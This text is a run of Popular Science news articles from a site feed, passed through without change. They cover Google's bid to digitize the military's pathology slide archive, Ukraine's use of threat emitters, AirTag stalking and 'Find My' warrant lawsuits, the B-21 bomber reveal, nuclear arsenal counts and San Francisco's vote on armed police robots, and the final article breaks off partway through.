In March of 2020, the Defense Innovation Board announced a series of recommendations to digitize the JPC collection. The board called for a pilot project to scan a large initial batch of slides — at least 1 million in the first year — as a prelude to the massive undertaking of digitizing all 55 million slides.

“My worldview was that this should be one of the highest priorities of the Defense Department,” William Bushman, then acting deputy undersecretary of personnel and readiness, told ProPublica. “It has the potential to save more lives than anything else being done in the department.”

As the pathology center prepared to launch its pilot, the staff talked about a scandal that occurred just 40 miles north.

Henrietta Lacks was a Black woman who died of cancer in 1951 while being treated at Baltimore’s Johns Hopkins Hospital. Without her or her family’s knowledge or consent, and without compensation, her cells were replicated and commercialized, leading to groundbreaking advances in medicine but also federal reforms on the use of patient cells for research.

Like Lacks’ cancer cells, every specimen in the archive, the JPC team knew, represented its own story of human mortality and vulnerability. The tissue came from veterans and current service members willing to put their lives on the line for their country. Most of the samples came from patients whose doctors discovered ominous signs from biopsies and then sent the specimens to the center for second opinions. Few signed consent forms agreeing to have their samples used in medical research.

The pathology center hired two experts in AI ethics to develop ethical, legal and regulatory guidelines. Meanwhile, the pressure to cooperate with Google hadn’t gone away.

In the summer of 2020, as COVID-19 surged across the country, Olson was stationed at a naval lab in Guam, working on an AI project to detect the coronavirus. That project was managed by a military group based out of Silicon Valley known as the Defense Innovation Unit, a separate effort to speed the military’s development and adoption of cutting-edge technology. Though the group worked with many tech companies, it had gained a reputation for being cozy with Google. The DIU’s headquarters in Mountain View, California, sat just across the street from the Googleplex, the tech giant’s headquarters. Olson joined the group officially that August.

Olson’s COVID-19 work earned him Navy Times’ coveted Sailor of the Year award as well as the attention of a man who would become a powerful ally in the DOD, Thomas “Pat” Flanders.

Flanders was the chief information officer of the sprawling Defense Health Agency, which oversaw the military’s medical services, including hospitals and clinics. A garrulous Army veteran, Flanders questioned the wisdom of running the pilot project without first getting funding to scan all of the 55 million slides. He wanted the pathology staff to hear about the work Olson and Google had done scanning pathology slides in San Diego and see if a similar public-private partnership could be forged with the JPC.

Over the objections of Moncur, the JPC’s director, Flanders insisted on having Olson attend all the pathology center’s meetings to discuss the pilot, according to internal emails.

In August 2020, the JPC published a request for information from vendors interested in taking part in the pilot project. The terms of that request specified that no feedback would be given to companies about their submissions and that telephone inquiries would not be accepted or acknowledged. Such conversations could be seen as favoritism and could lead to a protest by competitors who did not get this privilege.

But Flanders insisted that meeting Google was appropriate, according to Moncur’s statements to DOD lawyers.

In a video conference call, Flanders told the Google representatives they were “the smartest people on earth” and said he couldn’t believe he was “getting to meet them for free,” according to written accounts of the meeting provided to DOD lawyers.

Flanders asked Google to explain its business model, saying he wanted to see how both the government and company might profit from the center’s data so that he could influence the requirements on the government side — a remark that left even the Google representatives “speechless,” according to a compilation of concerns raised by DOD staffers.

To Moncur and others in attendance, Flanders was actively negotiating with Google, according to Moncur’s statement to DOD lawyers.

To the astonishment of the center staff, Flanders asked for a second meeting between Google and the JPC team.

Concern about Flanders’ conduct echoed in other parts of the DOD. A lawyer for Defense Digital Service, a team of software engineers, data scientists and product managers assigned to assist on the project, wrote that Flanders ignored legal warnings. He described Flanders as a “cowboy” who in spite of warnings about his behavior was not likely “to fall out of love with Google.”

In an interview with ProPublica, Flanders disputed claims that he was biased toward Google. Flanders said his focus has always been on scanning and storing the slides as quickly and economically as possible. As for his lavish praise of Google, Flanders said he was merely trying to be “kind” to the company’s representatives.

“People took offense to that,” Flanders said. “It’s just really pettiness on the part of people who couldn’t get along, honestly.”

A spokesperson for the Defense Health Agency said it was “totally appropriate” for Flanders to ask Google about its business model. “This is part of market research,” the spokesperson wrote, adding that no negotiation occurred at the meeting and that all government stakeholders had been invited to attend.

Moncur referred calls to a JPC spokesperson. A spokesperson for the JPC said in a statement that “Moncur was concerned about meeting with vendors during the RFI period.”

“An Arm of Google”

In late 2020, the modernization team received more troubling news. In a slide presentation for the JPC describing other AI work with Google and the military, Olson disclosed that the company had “made offers of employment, which I have declined.” But then he suggested the offer might be revived in the future, writing, “we mutually agreed to table the matter.” He said he had “no other conflicts of interest to declare.” Google told ProPublica it had never directly made Olson a job offer, though a temp agency it used did.

More facts surfaced. Olson also had a Google corporate email address. And he had access to Google corporate files, according to internal communications from concerned DOD staff members. Google said it is common for its research partners in the government to have these privileges.

“I am more worried than ever that DIU’s influence will destroy this acquisition,” a DOD lawyer wrote, referring to efforts to find vendors for the pilot project. He called DIU “essentially an arm of Google.”

At the time, a DIU lawyer defended Olson. The lawyer said Olson had “no further conflict of interest issues” and had done nothing improper because the job offer had been made three years earlier, in 2017. An ethics officer at the DOD Standards of Conduct Office agreed.

Today, a spokesperson in the Office of the Secretary of Defense told ProPublica the department was committed to modernizing the repository “while carefully observing all applicable legal and ethical rules.”

Olson’s friend and lawyer, Stephens, said Olson had been upfront, disclosing the job offer to the innovation unit’s lawyer as well as in the conflict-of-interest section of his slide presentation. He said Olson had declined the offer, which was withdrawn. “He’s not some kind of Google secret agent.”

Stephens said the JPC would have been much further down the road had it cooperated with Olson. Stephens said it became apparent to Olson that Moncur was “essentially ignoring” a “gold mine that could help a lot of people.”

“Niels is the tenacious doctor who is just trying to do the science and build a coalition of partners to get this thing done,” Stephens said. “I think he’s the hero of this story.”

Google Turns to Congress

In 2021, the pathology center selected one of the most prestigious medical institutions in the world, Johns Hopkins — which plans to erect a building honoring Henrietta Lacks — to assist it in scanning slides. It picked two small technology companies to start building tools to let pathologists search the archive.

Google wanted to be selected, and in a confidential proposal, it offered to help the repository build up its own slide-scanning capabilities.

When Google was not selected for the pilot project, the company went above the JPC leaders’ heads. Google claimed in a letter to Pentagon leaders that the company had been unfairly excluded from “full and open competition.” In that August 2021 letter, Google argued that the nation’s security was at stake. It asked the DOD to “consider allowing Google Cloud” and other providers to compete to ensure the “nation’s ability to compete with China in biotechnology.”

Time was of the essence, Google warned. “The physical slides at the JPC are degrading rapidly each day. … Without further action, the slides will continue to degrade and some may ultimately be damaged beyond repair.”

Google stepped up its advocacy campaign. The company deployed a lobbying firm, the Roosevelt Group — which boasts of its ability to “leverage” its connections to secure federal business opportunities to its clients — to raise doubts about the JPC’s pilot project. Their efforts worked. In little-noticed language in a report written to accompany the 2023 Defense Authorization Act, the House Armed Services Committee expressed its concern about the speed of the scanning process and the choice of technology, which the committee claimed would not allow the “swift digitization of these deteriorating slides.”

The committee had its own ideas of how the pathology center’s work should be carried out, suggesting that the center work in tandem with the DIU, using an augmented reality microscope whose software was engineered by Google.

In a statement, the Roosevelt Group told ProPublica it was “proud” of its work for Google. The firm said it helped the company “educate professional staff of the House and Senate Armed Services Committees over concerns about the lack of an open procurement process for digitization of slides.” The group chided DOD officials for being “unwilling to provide answers to Congress around the lack of progress on the JPC digitization effort.”

The pathology center staff was dismayed by the committee’s recommendations that it work with Olson’s group.

In a video conference meeting late last summer with Armed Services Committee staff, the leaders of the pathology center attempted to rebut the House committee report. The JPC’s work was going as planned, they said, noting that a million slides had been scanned. And the pathology center was collaborating with the National Institutes of Health to develop AI tools to help predict prognoses for cancer treatments.

The House Armed Services Committee ordered Pentagon leaders to “conduct a comprehensive assessment” on the digitization effort and to provide a briefing to the committee on its findings by April 1, 2023.

In a statement in response to ProPublica’s questions about the bill, Ladd, the Google spokesperson, acknowledged the company’s influence efforts on Capitol Hill. “We frequently provide information to congressional staff on issues of national importance,” Ladd said. The statement confirmed that the company suggested “language be inserted” into the 2023 Defense Authorization Act calling for a “comprehensive assessment” of the digitization effort.

“Despite efforts from Google and many at the Department of Defense, our work with JPC unfortunately never got off the ground, and the physical repository of pathology slides continues to deteriorate,” Ladd said. “We remain optimistic that if the repository could be properly digitized, it would save many American lives, including those of our service members.”

On this last point, even Google’s critics are in accord. A properly funded project would cost taxpayers a few hundred million dollars — a minuscule portion of the $858 billion defense budget and a small price if the lifesaving potential of the collection is realized.

Last year, as tensions grew with Google, the modernization team at the repository launched a publicity campaign to call attention to the project and the high ethical stakes.

An entire panel discussion was devoted to the JPC effort at the 2021 South by Southwest conference. “This is a once in a lifetime opportunity, and I want to make sure we do it right, we do it responsibly and we do it ethically,” said Steven French, the DOD cloud computing engineer assigned to assist the repository.

Then without mentioning Google’s name, he added a Shakespearean barb. “There’s plenty of vendors, plenty of companies, plenty of people,” French said, “who are more than willing to do this and extract a pound of flesh from us in the process.”

The post Inside Google’s quest to digitize troops’ tissue samples appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Ukraine could use ‘threat emitters’ to trick Russian pilots https://www.popsci.com/technology/ukraine-us-threat-emitters/ Wed, 07 Dec 2022 20:07:01 +0000 https://www.popsci.com/?p=496036
This Joint Threat Emitter is seen in Japan in 2021.
This Joint Threat Emitter is seen in Japan in 2021. US Air Force / Leon Redfern

Here's what threat emitters do, and how this training tool could be used in a real war.

The post Ukraine could use ‘threat emitters’ to trick Russian pilots appeared first on Popular Science.

]]>
This Joint Threat Emitter is seen in Japan in 2021.
This Joint Threat Emitter is seen in Japan in 2021. US Air Force / Leon Redfern

To confuse Russian aircraft, Ukraine reportedly has access to a training tool from the United States. Known as “Threat Emitters,” they are a way for pilots to learn the signatures of hostile aircraft and missiles, allowing them to safely practice identifying and reacting to combat situations in training. In simulated scenarios, pilots learn how their sensors would perceive real threats, and can safely plan and adapt to the various anti-aircraft weapons they might encounter. The net effect is that pilots learn to fight against a phantom representation of air defenses, in preparation for the real thing.

But when brought to actual war, the emitters in turn are a way to make an enemy’s sensors less reliable, confounding adversarial pilots about what is real and what is merely an electromagnetic mirage.

These “low-cost emitters were built for ranges inside the U.S. but now are in the hands of Ukrainians,” reported Aviation Week, citing Air Force Chief of Staff Charles Q. Brown Jr. “The emitters can replicate surface-to-air missiles and aircraft, and are a cheap, innovative way to further complicate the air picture for Russia.”

One such system is the Joint Threat Emitter. There are two major components to the system: a command unit that lets soldiers operate it, and trailer-mounted radar threat emitters. A command unit can control up to 12 different threat emitters, and each emitter can simulate up to six threats at once. 

These emitters help pilots train on their sensors, practicing for war when far from conflict. In 2013, the Air Force and Navy set up Joint Threat Emitters at Andersen Air Force Base on Guam. Both the Navy and Air Force operate from the island, and as the American territory closest to North Korea and China, Guam is prominently featured in war plans around either country. 

“When [pilots] go to a real-world situation, they won’t see anything that we haven’t thrown at them before,” Staff Sgt. Rick Woltkamp, a ground radar systems craftsman with the Idaho Air National Guard, said in 2013. “We simulate a ground attack, and the pilot will react and respond accordingly to the simulation.”

[Related: The Air Force wants to start using its ‘Angry Kitten’ system in combat]

Development and use of the tech goes back two decades. In 2002, the Air Force selected Northrop Grumman to develop the Joint Threat Emitter over the next 10 years as a “high-fidelity, full-power threat simulator that is capable of generating radar signals associated with threat systems” that will “better enable aircrews to train in modern war environments.”

Some of the signals it can generate mimic surface-to-air missiles and anti-aircraft artillery, both of which threaten planes but require different countermeasures. One example of a non-missile air defense system is the ZSU-23, built by the Soviet Union. The ZSU is an armored vehicle with anti-aircraft guns pointed on a turret that uses a radar dish to guide its targeting. As a Soviet-made system, ZSU-23 systems were handed down to successor states, and are reportedly in operation by both the militaries of Ukraine and Russia.

When used for training purposes, the Joint Threat Emitters let pilots perceive and adapt to the presence of enemies, beyond visual line of sight. At these distances, pilots rely largely on sensor readings to see and anticipate the danger they are flying into. One way for them to adapt might be to pick a new route, further from the anti-air radars. Another would be to divert the attack to knock out anti-air systems first.

[Related: How electronic warfare could factor into the Russia-Ukraine crisis]

In Ukraine, the likely use case for these emitters is to augment the country’s existing air defenses. Using the emitters to project air-defense signals across the battlefield—signals identical to known and real Ukrainian air defenses—could mask where the actual defenses are. Real defenses lurking in a sea of mirage defenses, simulated but not backed up by the actual weapons, is a vexing proposition for an attacker. Discovering what is real means probing the defenses with scouts (or hoping that satellite imagery provides a timely update). But because the emitters, like the weapons they emulate, can be driven around, even a view from space cannot accurately pin down a fixed location for long.

Russia’s air force has struggled to achieve air superiority over Ukraine since it invaded in February 2022. Existing air defenses, from vintage human-portable missiles to newer arrivals, put planes and helicopters at real risk for attack. Videos of Russian helicopters lobbing rockets, increasing range while greatly reducing accuracy, suggest that even in the war’s earliest months Russian pilots were afraid of existing Ukrainian anti-air defenses. 

While the threat emitters alone do not offer any direct way to shoot down aircraft, having them in place makes Russia’s work of attacking from the sky that much harder. Even if a threat emitter is found and destroyed, it likely means that Russia spent ammunition hitting a decoy target, while missing a real and tangible threat.

The post Ukraine could use ‘threat emitters’ to trick Russian pilots appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Apple sued by stalking victims over alleged AirTag tracking https://www.popsci.com/technology/lawsuit-apple-airtags-stalking/ Wed, 07 Dec 2022 17:15:00 +0000 https://www.popsci.com/?p=495908
Hundreds of stalking incidents have involved AirTags since their debut last year.
Hundreds of stalking incidents have involved AirTags since their debut last year. Jonas Elia on Unsplash

The lawsuit argues that Apple has enabled abuse, stalking, and physical violence against victims.

The post Apple sued by stalking victims over alleged AirTag tracking appeared first on Popular Science.

]]>
Hundreds of stalking incidents have involved AirTags since their debut last year.
Hundreds of stalking incidents have involved AirTags since their debut last year. Jonas Elia on Unsplash

Yesterday, two women filed a potential class action lawsuit against Apple, alleging the company has ignored critics’ and security experts’ repeated warnings that the company’s AirTag devices are being repeatedly used to stalk and harass people. Both individuals were targets of past abuse from ex-partners and argued in the filing that Apple’s subsequent safeguard solutions remain wholly inadequate for consumers.

“With a price point of just $29, it has become the weapon of choice of stalkers and abusers,” reads a portion of the lawsuit, as The New York Times reported yesterday.

Apple first debuted AirTags in April 2021. Within the ensuing eight months, at least 150 police reports from just eight precincts reviewed by Motherboard explicitly mentioned abusers utilizing the tracking devices to stalk and harass women. In the new lawsuit, plaintiffs allege that one woman’s abuser hid the location devices within her car’s wheel well. At the same time, the other woman’s abuser placed one in their child’s backpack following a contentious divorce, according to the suit. Security experts have since cautioned that hundreds more similar situations likely remain unreported or even undetected.

[Related: Apple AirTag: 8 common questions answered.]

At roughly the size of a quarter or large coat button, AirTags are marketed as a cheap, accurate tool to keep track of items such as individuals’ keys, wallets, purses, and other small everyday items. The lawsuit, published by Ars Technica, cites them as “one of the products that has revolutionized the scope, breadth, and ease of location-based stalking,” arguing that “what separates the AirTag from any competitor product is its unparalleled accuracy, ease of use (it fits seamlessly into Apple’s existing suite of products), and affordability.”

AirTags rely on Bluetooth signals within Apple’s “Find My” network and thus can show owners their device’s approximate location. Despite Apple’s initial claims that AirTags were “stalker-proof,” the company issued a statement in February 2022 relaying that it had “seen reports of bad actors attempting to misuse AirTag for malicious or criminal purposes,” and was subsequently working with “various safety groups and law enforcement organizations” to address the abuse.

[Related: Colorado police sued over SWAT raid based on ‘Find My’ app screenshot.]

Critics and the lawsuit argue that a subsequent series of minor updates—such as text alerts when AirTags are detected nearby and the introduction of a 60-decibel location chime—fail to address the vast majority of victims’ issues. The complaint also notes that Apple’s unspecified, previously promised updates due by the end of the year have yet to materialize.

None of the stopgaps are particularly helpful for Android users, either, who must download a Tracker Detector app and manually search for AirTags nearby. The lawsuit reminds readers that this is “something a person being unknowingly tracked would be unlikely to do.”

The proposed class action lawsuit seeks unspecified damages for owners of iOS or Android devices which have been tracked with an AirTag or are at risk of being stalked. Since AirTags’ introduction last year, at least two murders have occurred directly involving using Apple’s surveillance gadget, according to the lawsuit.

The post Apple sued by stalking victims over alleged AirTag tracking appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Our first look at the Air Force’s new B-21 stealth bomber was just a careful teaser https://www.popsci.com/technology/b-21-raider-bomber-reveal/ Mon, 05 Dec 2022 22:00:36 +0000 https://www.popsci.com/?p=495172
the B-21 raider bomber
The B-21 Raider was unveiled on Dec. 2. At right is Secretary of Defense Lloyd Austin, who spoke at the event. DOD / Chad J. McNeeley

Northrop Grumman revealed the B-21 Raider in a roll-out ceremony. Here's what we know about it—and what remains hidden.

The post Our first look at the Air Force’s new B-21 stealth bomber was just a careful teaser appeared first on Popular Science.

]]>
the B-21 raider bomber
The B-21 Raider was unveiled on Dec. 2. At right is Secretary of Defense Lloyd Austin, who spoke at the event. DOD / Chad J. McNeeley

On Friday, the public finally got a glimpse at the Air Force’s next bomber, the B-21 Raider. Northrop Grumman, which is producing it, rolled out the futuristic flying machine at a ceremony in Palmdale, California, on Dec. 2. It’s a stealthy aircraft, meaning that it’s designed to have a minimal radar signature. It’s also intended to carry both conventional and nuclear weapons. 

The new aircraft will eventually join a bomber fleet that currently consists of three different aircraft types: the old, not-stealthy B-52s, the supersonic B-1Bs, and the B-2 flying wing, which is the B-21’s most direct ancestor. 

Here’s what to know about the B-21 Raider.

The B-21 Raider
The B-21 Raider. US Air Force

A throwback to 1988

At the B-21’s unveiling, the US Secretary of Defense, Lloyd Austin, referred to the new plane as “the first bomber of the 21st century.” Indeed, the bomber models it will eventually replace include the 1980s-era aircraft, the B-2 Spirit. 

As Peter Westwick recounts in his history of low-observable aircraft in the United States, Stealth, two aircraft makers competed against each other to build the B-2. Northrop prevailed against Lockheed to build the stealth bomber, while Lockheed had previously beaten Northrop when it came to creating the first stealth fighter: the F-117. Northrop scored the contract to build the B-2 in late 1981, and rolled out the craft just over seven years later, in 1988. 

The 1988 roll-out event, Westwick writes, included “no fewer than 41 Air Force generals,” and an audience of 2,000 people. “A tractor towed the plane out of the hangar, the crowd went wild, the press snapped photos, and then the tractor pushed it back out of sight,” he writes. It flew for the first time in 1989.

[Related: The B-21 bomber won’t need a drone escort, thank you very much]

Today, the B-2 represents the smallest segment of the US bomber fleet, by the numbers. “We only bought 21 of them,” says Todd Harrison, a defense analyst at Metrea Strategic Insights. “One has crashed, one is used for testing, and at any given time, several others will be in maintenance—so the reality is we have far too few stealthy bombers in our inventory, and the only way to get more was to design and build a whole new bomber.” 

The B-2 Spirit, seen here from a refueling aircraft, in 2012.
The B-2 Spirit, seen here from a refueling aircraft, in 2012. US Air Force / Franklin Ramos

The new bomber

The B-21, when it does fly, will join the old group of bombers. Those planes, such as the B-1, “are really aging, and are hard to keep in the air—they’re very expensive to fly, and they just don’t have the capabilities that we need in the bomber fleet of today and in the future,” Harrison says. The B-52s date to the early 1960s; one B-52 pilot once told Popular Science that being at the controls of that aircraft feels like “flying a museum.” If the B-52 is officially called the Stratofortress, it’s also been called the Stratosaurus. (A likely future scenario is that the bomber fleet eventually becomes just two models: B-52s, which are getting new engines, and the B-21.)

[Related: Inside a training mission with a B-52 bomber, the aircraft that will not die]

With the B-21, the view offered by the unveiling video is just of the aircraft from the front, a brief vision of a futuristic plane. “They’re not likely to reveal the really interesting stuff about the B-21,” observes Harrison. “What’s most interesting is what they can’t show us.” That includes internal as well as external attributes. 

Publicly revealing an aircraft like this represents a calculated decision to show that a capability exists without revealing too much about it. “You want to reveal things that you think will help deter Russia or China from doing things that might provoke us into war,” he says. “But, on the other hand, you don’t want to show too much, because you don’t want to make it easy for your adversary to develop plans and technologies to counter your capabilities.”

Indeed, the way that Secretary of Defense Austin characterized the B-21 on Dec. 2 walked that line. “The B-21 looks imposing, but what’s under the frame, and the space-age coatings, is even more impressive,” he said. He then spoke about its range, stealth attributes, and other characteristics in generalities. (The War Zone, a sibling website to PopSci, has deep analysis on the aircraft here and has interviewed the pilots who will likely fly it for the first time here.)

Mark Gunzinger, the director for future concepts and capability assessments at the Mitchell Institute for Aerospace Studies, says that the B-21 rollout, which he attended, “was very carefully staged.” 

[Related: The stealth helicopters used in the 2011 raid on Osama bin Laden are still cloaked in mystery]

“There were multiple lights on each side of the aircraft that were shining out into the audience,” he recalls. “The camera angles were very carefully controlled, reporters were told what they could and could not do in terms of taking photos, and of course, the aircraft was not rolled out all the way—half of it was still pretty much inside the hanger, so people could not see the tail section.” 

“The one word you heard the most during the presentation from all the speakers was ‘deterrence,'” Gunzinger adds. Part of achieving that is signaling to others that the US has “a creditable capability,” but at the same time, “there should be enough uncertainty about the specifics—performance specifics and so forth—so they do not develop effective countermeasures.”

The B-21 rollout concluded with Northrup Grumman’s CEO, Kathy Warden, who mentioned the aircraft’s next big moment. “The next time you see this plane, it’ll be in the air,” she said. “Now, let’s put this plane to bed.” 

And with that, it was pushed back into the hanger, and the doors closed in front of it. 

Watch the reveal video, below.

The post Our first look at the Air Force’s new B-21 stealth bomber was just a careful teaser appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Colorado police sued over SWAT raid based on ‘Find My’ app screenshot https://www.popsci.com/technology/police-find-my-swat-raid/ Mon, 05 Dec 2022 20:30:00 +0000 https://www.popsci.com/?p=494911
A phone screen showing FindMy app
Apple's 'Find My' feature gives approximate, not exact, locations. Deposit Photos

The ACLU is suing on behalf of 77-year-old Ruby Johnson, claiming that a police officer mischaracterized the accuracy of the app's locator to obtain a search warrant.

The post Colorado police sued over SWAT raid based on ‘Find My’ app screenshot appeared first on Popular Science.

]]>
A phone screen showing FindMy app
Apple's 'Find My' feature gives approximate, not exact, locations. Deposit Photos

On January 4, 2022, the Denver Police Department (DPD) sent its SWAT team into Ruby Johnson’s home looking for six firearms, two drones, $4,000, and an old iPhone recently reported stolen. For hours, law enforcement armed with automatic weapons scoured the 77-year-old grandmother’s home of four decades. The raid was based on a search warrant which cited the iPhone theft victim’s utilization of Apple’s “Find My” device feature that police claimed pinged Johnson’s address. Police found none of the stolen items, nor the white truck in which they were previously located. Now, Johnson is suing the detective who submitted the search warrant, citing a “‘bare bones’ affidavit that blatantly misrepresented the facts and misled the reviewing judge” including the supposed accuracy and specific search results of the Find My app’s use. The complaint describes a traumatic raid and damaged property.

[Related: How to track down your lost devices.]

Apple first introduced its “Find My [device]” feature in 2019, which uses location tracking to pinpoint owner’s potentially missing iPhones, iPads, and AirPods. When enabled, Find My can issue a pinging alarm tone to help locate the items if they are connected to WiFi or a cellular network, and sends an alert to users’ Apple ID email address. Users can also pull up the device’s approximate location on their Maps app.

Johnson’s lawsuit, filed last week by the Colorado ACLU, reads that DPD Detective Gary Staab “claimed the Apple technology demonstrated that the stolen iPhone—and presumably the stolen guns and drones—were inside Ms. Johnson’s house.” As seen in a screenshot of the app in court documents, Find My was showing a larger blue circle touching four different blocks and six different properties where the phone may have been located, the complaint explains. The ACLU added that, “On the contrary, the app indicated that the phone’s location could not accurately be identified and there was zero basis to single out Ms. Johnson’s home.” The complaint claims that Staab mischaracterized the screenshot to the judge. Johnson’s legal team is seeking compensatory damages, attorneys’ fees, pre- and post-judgement interest, as well as any other relief deemed by the court.

[Related: Keep tabs on how much access your computer’s apps have to your system.] 

The ACLU’s statement and complaint cite several issues with Staab’s procedure. Aside from failing to disclose to the judge that the Find My app only offered an approximate location of the iPhone, the DPD detective didn’t attempt to independently corroborate the stolen items’ alleged location ahead of time. “Ms. Johnson’s case is just one example of a larger problem of police obtaining warrants and invading people’s homes based on false information, including—like in this case—when police misrepresent the significance and accuracy of technology,” wrote the ACLU.

The post Colorado police sued over SWAT raid based on ‘Find My’ app screenshot appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
A snapshot of the world’s nuclear weapons—and how the numbers are changing https://www.popsci.com/technology/world-nuclear-weapons-numbers/ Mon, 05 Dec 2022 12:00:00 +0000 https://www.popsci.com/?p=494390
An American ballistic missile submarine received supplies from an MV-22 Osprey aircraft in August, 2018.
An American ballistic missile submarine received supplies from an MV-22 Osprey aircraft in August, 2018. US Navy

A new Pentagon report offers a look at how one arsenal is shifting.

The post A snapshot of the world’s nuclear weapons—and how the numbers are changing appeared first on Popular Science.

]]>
An American ballistic missile submarine received supplies from an MV-22 Osprey aircraft in August, 2018.
An American ballistic missile submarine received supplies from an MV-22 Osprey aircraft in August, 2018. US Navy

On November 29, the Department of Defense released its annual report on the military power of China. The document offers a public-facing look at how the military of the United States assesses the only country it truly considers to be a potential rival. Most strikingly, the report suggests that not only is China expanding its nuclear arsenal, but it is potentially on track to field 1,500 nuclear warheads by 2035.

Nuclear warheads are hardly the only measure of a nation’s destructive power, but they’re easily the most eye-catching. China already has the world’s third-largest nuclear arsenal, behind Russia and the United States. 

In the report, the Pentagon estimates China’s arsenal to currently be over 400 warheads. The Federation of American Scientists, which produces an independent assessment of nuclear forces, estimated China’s arsenal at over 350 warheads as of early 2022. Getting to 1,500 warheads by 2035 would require China to produce 85 warheads a year, every year, until then.

Nuclear numbers

China’s arsenal, while large and growing, is relatively in keeping with the arsenals of India, Pakistan, the UK, and France. More specifically, India is estimated by the Federation to have 160 warheads while France has 290. (North Korea and Israel, with 20 and 90, respectively, have the fewest.) 

These arsenals are all an order of magnitude or two smaller than the 5,428 for the United States, and 5,977 for Russia. That’s a huge change in scale, with the world’s largest arsenal roughly 300 times as big as the world’s smallest. It’s also a divide largely determined by history. The United States and the Soviet Union, from which Russia inherited its nuclear arsenals, were the first two countries to develop and test atomic weapons, and they did so in the context of the Cold War, after the United States used two atomic bombs at the end of World War II.

Importantly, the arsenals of the United States and Russia remain bound by arms control treaties, most crucially the New START treaty. While the US and Russia both maintain thousands of warheads in stockpiles or reserves, they both actively deploy roughly 1,600 warheads each. That’s comparable to the total the Pentagon estimates China to be working towards.

Throughout the Cold War, arsenal increases were driven by advances in technology and changes in strategy. More warheads in more missiles, including missiles that could carry and launch multiple warheads at once, developed as an approach to guaranteeing destruction in the face of developments around sophisticated defenses, like missile interceptors or silos hardened against nuclear attack. New technologies, like the continued development by Russia, China, and the United States of hypersonic weapons, could similarly bend arsenal design to more warheads, ensuring that the missiles launched in an attack can cause sufficient harm upon arrival. 

Launching points

Warheads are the smallest unit of a nuclear arsenal. They are, after all, the part that creates the explosions. But a nuclear warhead on its own is just a threat waiting to be sent somewhere far away. What really determines the effectiveness of warheads is the means available to launch them.

In the United States, there exists what’s known as the nuclear triad: Intercontinental Ballistic Missiles (ICBMs) launched from silos, submarine-launched missiles, and weapons delivered by planes. But even that seemingly simple triad fails to capture the complexity of launch. The United States can fire Air Launched Cruise Missiles with nuclear warheads from bombers, a weapon that travels at a different trajectory than gravity bombs or ballistic missiles.

The Pentagon report outlines China’s platforms across air, sea, and land. Air is covered by China’s existing H-6N bomber class. At sea, China has six operational nuclear-armed submarines, with development expected on a next-generation nuclear-armed submarine this decade. On land, China has both road-mobile missile launcher-erector trucks, which can relocate and launch long-range missiles across the country, and growing silo fields, capable of housing ICBMs underground.

The distribution of warheads across submarines, planes, road-mobile missiles, and silos matters, because it can suggest what kind of nuclear war a country anticipates or wants to deter. Silos are especially notable because they are designed to launch in retaliation to a first strike, like submarines, but unlike submarine-launched missiles, silos are specifically placed to attract incoming attack, diverting enemy firepower away from civilians or military command as a missile sink.

Road-mobile missiles, instead, are vulnerable when found, but can be relocated to avoid strikes like submarines and bombers, only with the added feature that they are visible from space. The act of signaling—when one nation uses the position and readiness of nuclear weapons to communicate with other nations indirectly—is tricky, but one of the signs countries look for is obvious mobilization seen from satellite photography. 

Ultimately, the increase in warhead numbers suggests a growing arsenal, though it is hard to know what the end state of that arsenal will be. Producing nuclear weapons is hard, dangerous work. Wielding them, even as a deterrent, is risky as well. 

What is certain, at least, is that the days of talking about Russia and the United States as the world’s predominant nuclear powers may be trending towards an end. Cold War arms control and limitation treaties, which halted and then meaningfully reduced arsenal sizes, were done in the context of two countries agreeing together. Reducing arsenals in the 21st century will likely be a multi-party effort. 

The post A snapshot of the world’s nuclear weapons—and how the numbers are changing appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Armed police robots will be a threat to public safety. Here’s why. https://www.popsci.com/technology/armed-police-robots-san-francisco/ Fri, 02 Dec 2022 15:00:00 +0000 https://www.popsci.com/?p=493962
A robot used for explosive ordnance disposal is seen in Qatar in 2017.
A robot used for explosive ordnance disposal is seen in Qatar in 2017. US Air Force / Amy M. Lovgren

A recent vote in San Francisco allows police robots to use lethal force, such as with explosives.

The post Armed police robots will be a threat to public safety. Here’s why. appeared first on Popular Science.

]]>
A robot used for explosive ordnance disposal is seen in Qatar in 2017.
A robot used for explosive ordnance disposal is seen in Qatar in 2017. US Air Force / Amy M. Lovgren

On November 29, San Francisco’s government voted 8 to 3 to authorize the use of lethal weapons by police robots. The vote and authorization, which caught national attention, speaks directly to the real fears and perils regarding the use of robotics and remote-control tools domestically. The vote took place in the context of a 2021 law enacted by California mandating that police get approval from local governing authorities over what equipment it uses and how it does so. 

As the the San Francisco Chronicle reported, city Supervisor Aaron Peskin told his colleagues: “There could be an extraordinary circumstance where, in a virtually unimaginable emergency, they might want to deploy lethal force to render, in some horrific situation, somebody from being able to cause further harm,” offering a rationale for why police may want to use a robot to kill.

Police robots are not new, though the acquisition of military-grade robots was bolstered by a program that offered local police departments surplus military goods. Bomb squad robots, used heavily in Iraq and Afghanistan to relocate and safely dispose of roadside bombs, or Improvised Explosive Devices, were offered to police following the drawdowns of US forces from those countries in the 2010s. 

Many of the tools that ultimately end up in police hands first see their debut in military contexts, especially in counter-insurgency or irregular warfare. Rubber bullets, a now-ubiquitous less-lethal police weapon, have their origin in the wooden bullets of British Hong Kong and the rubber bullets of British forces in Northern Ireland. MRAPS, the massive heavy armored vehicles hastily produced to protect soldiers from bombs in Iraq and Afghanistan, have also seen a second post-war life in police forces.

Bomb squad robots are remarkable, in part, because they are a tool for which the military and police applications are the same. A robot with a gripper and a camera, remotely controlled over a long tether, can inspect a suspicious package, sparing a human life in the event of detonation. Police and military bomb squads even train on the robots together, sharing techniques for particularly tricky cases

San Francisco’s government voted to allow police, with explicit authorization from “one of two high-ranking SFPD leaders” to authorize the lethal use of an armed robot, reports the San Francisco Chronicle. The Chronicle also notes that “the department said it has no plans to outfit robots with a gun,” instead leaving the killing to explosives mounted on robots.

Past precedent

